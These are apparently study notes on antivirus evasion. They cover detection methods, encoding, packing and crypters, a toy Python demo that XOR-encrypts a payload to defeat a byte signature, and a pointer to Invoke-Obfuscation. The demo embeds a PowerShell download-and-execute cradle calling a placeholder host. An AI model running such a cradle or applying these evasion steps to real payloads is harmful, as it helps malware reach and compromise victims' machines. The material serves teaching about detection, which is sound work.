AV Evasion Techniques

AV Detection Methods

AV software typically combines signature-based, heuristic-based and behaviour-based detection.

  1. Signature-based detection - An AV signature is a sequence of bytes (or a file hash) that identifies a known malware sample or family. Your obfuscated exploit or payload must therefore not match any signature in the AV database. Signature-based detection is bypassed by changing the malware's byte sequence (encoding, encrypting, packing or recompiling it), which changes the signature. The catch is that the bytes have to be turned back into runnable code at some point, which is what the other two detection methods target.
  2. Heuristic-based detection - Relies on rules or scoring to decide whether a binary is malicious, looking for suspicious patterns in the code itself or in the API calls it makes (for example a decryption loop followed by a jump into the decrypted buffer) rather than for an exact byte match.
  3. Behaviour-based detection - Identifies malware by monitoring what it does at runtime (process injection, persistence changes, unusual network connections) rather than what it looks like on disk. This is the method that catches newer strains for which no signature exists yet.

On-disk Evasion Techniques

1. Obfuscation:

Obfuscation refers to the process of concealing something important, valuable or critical. Applied to code, it means restructuring the program so that it is harder to analyze or reverse engineer, and so that it no longer matches existing signatures, while keeping its behaviour unchanged.

2. Encoding:

Encoding changes data into a new representation using a known scheme (for example Base64 or hex). Encoding is reversible and needs no key; anyone who recognises the scheme can decode it, so it is not encryption. It still changes every byte on disk, which is often enough to break a static signature.

3. Packing:

A packer compresses or transforms the executable into a new binary structure, usually smaller, and prepends an unpacking routine that rebuilds the original code in memory at runtime. The packed file therefore has a new signature. Note that common packers are themselves well known to AV, so a packed file can be flagged for the packer alone.

4. Crypters:

Encrypts the code or payload on disk and decrypts it in memory at runtime. The decryption key and routine are stored in a stub that is bundled with the encrypted payload. The stub is what actually sits on disk, so it can in turn be signatured; crypters typically randomise the key and stub per build for that reason.
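To make the signature point from the detection section concrete, and to show how the encoding and crypter techniques above relate to it, here is a small added example (not from the original notes). The "payload" is a harmless constructed PowerShell one-liner and the "signature" is a constructed byte sequence, standing in for a real AV signature; the XOR cipher stands in for whatever algorithm a real crypter uses. It checks that the encoded and encrypted artifacts no longer contain the signature, while the stub's in-memory output does.

```python
"""Toy model of signature-based detection versus encoding and a crypter stub.

Added example for these notes. PAYLOAD and SIGNATURE are constructed for
illustration; neither is real malware nor a real AV signature.
"""
import base64
import hashlib
import os

# Constructed stand-in for a payload: a harmless-looking download cradle.
PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/stage.ps1')"

# Constructed stand-in for an AV signature: a fixed byte sequence scanned for on disk.
SIGNATURE = b"Net.WebClient).DownloadString"


def signature_hit(blob, signature=SIGNATURE):
    """Mimic signature-based detection: an exact byte-sequence search."""
    return signature in blob


def encode_payload(payload):
    """Encoding (reversible, keyless): Base64 changes every byte on disk."""
    return base64.b64encode(payload)


def decode_payload(blob):
    """Anyone who recognises the scheme can reverse it; no key is involved."""
    return base64.b64decode(blob)


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_crypted_artifact(payload, key=None):
    """Crypter build step: encrypt the payload with a (random) key.

    Returns (encrypted_body, key). In a real crypter the key is embedded in the
    stub and randomised per build so that the stub itself is not a static signature.
    """
    key = key or os.urandom(16)
    return xor_bytes(payload, key), key


def stub_run(encrypted_body, key):
    """Stub at runtime: recover the cleartext in memory only."""
    return xor_bytes(encrypted_body, key)


def fingerprint(blob):
    """File-hash style signature: any byte change yields a new hash."""
    return hashlib.sha256(blob).hexdigest()


def demo():
    """Run the comparison and return the observations as a dict."""
    encoded = encode_payload(PAYLOAD)
    body, key = build_crypted_artifact(PAYLOAD)
    return {
        "plain_hit": signature_hit(PAYLOAD),             # on-disk cleartext is caught
        "encoded_hit": signature_hit(encoded),           # Base64 output cannot contain '.' or ')'
        "encrypted_hit": signature_hit(body),            # ciphertext bears no resemblance
        "decoded_matches": decode_payload(encoded) == PAYLOAD,
        "stub_output_hit": signature_hit(stub_run(body, key)),  # memory scan would still see it
        "hash_changed": fingerprint(PAYLOAD) != fingerprint(body),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The last two observations are the caveat a practitioner cares about: the decrypted bytes in memory are identical to the original, so a memory scanner or behaviour-based engine that watches what the stub does after decryption is unaffected by any of the on-disk tricks above.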

In-Memory Evasion Techniques:
Obfuscation

Invoke-Obfuscation

Invoke-Obfuscation is an open-source PowerShell command and script obfuscator, compatible with PowerShell v2.0 and later. It rewrites a script at the token, string and encoding level so that the on-disk text no longer matches static signatures while the script still executes the same way.

GitHub Repo: https://github.com/danielbohannon/Invoke-Obfuscation